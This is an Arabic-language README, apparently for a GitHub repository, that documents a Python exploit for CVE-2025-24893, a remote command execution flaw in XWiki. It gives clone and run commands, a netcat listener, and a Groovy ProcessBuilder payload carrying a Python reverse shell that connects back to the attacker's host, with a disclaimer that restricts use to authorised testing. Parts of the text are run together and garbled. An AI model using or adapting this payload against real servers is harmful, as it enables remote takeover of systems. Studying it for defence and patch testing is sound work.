
استغلال معدل لـ CVE-2025-24893
نص بايثون 3 بسيط لاستغلال CVE-2025-24893، وهي ثغرة تنفيذ أوامر عن بعد في منصة XWiki، باستخدام ماكرو غير متزامن قائم على Groovy وحمولة شل عكسية قابلة للتكوين.
⚠️ تحذير: هذه الأداة مقدمة لأغراض تعليمية واختبارية مصرح بها فقط. الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها غير قانوني وغير أخلاقي.
ProcessBuilder لتجنب مشاكل Runtime.execrequestspip install requests
استنساخ هذا المستودع:
git clone https://github.com/hackersonsteroids/cve-2025-24893.git
cd cve-2025-24893
./exploit.py <TARGET_DOMAIN> <LHOST> <LPORT>
<TARGET_DOMAIN> مضيف XWiki (مثل wiki.example.local).
<LHOST> عنوان IP لجهاز المهاجم (حيث يعمل المستمع الخاص بك).
<LPORT> منفذ المستمع (عدد صحيح).
nc -lvnp 4444
./exploit.py wiki.vulnerable.local 10.0.0.5 4444
netcat الخاص بك للحصول على شل.قبل إرسال الحمولة، يقوم النص بـ:
https://<TARGET_DOMAIN>http://<TARGET_DOMAIN> إذا فشل HTTPSيساعد هذا في ضمان التوافق مع النشرات المختلطة البروتوكول.
افتراضيًا، يستخدم النص سطرًا واحدًا من بايثون 3:
new ProcessBuilder(
['/bin/bash','-c',
'python3 -c \'import socket,subprocess,os;'
's=socket.socket();s.connect(("LHOST",LPORT));'
'os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);'
'os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])\'']
).redirectErrorStream(true).start()
build_payload() إذا كنت بحاجة إلى شل مختلفة (مثل Bash، Perl، PHP، إلخ).هذا المشروع مرخص بموجب رخصة MIT. راجع ملف LICENSE للتفاصيل.
هذه الأداة مصممة لتقييم الأمن المصرح به والأغراض التعليمية فقط. لا يتحمل المؤلفون أي مسؤولية عن سوء الاستخدام. احصل دائمًا على إذن صريح قبل اختبار أي أنظمة مستهدفة.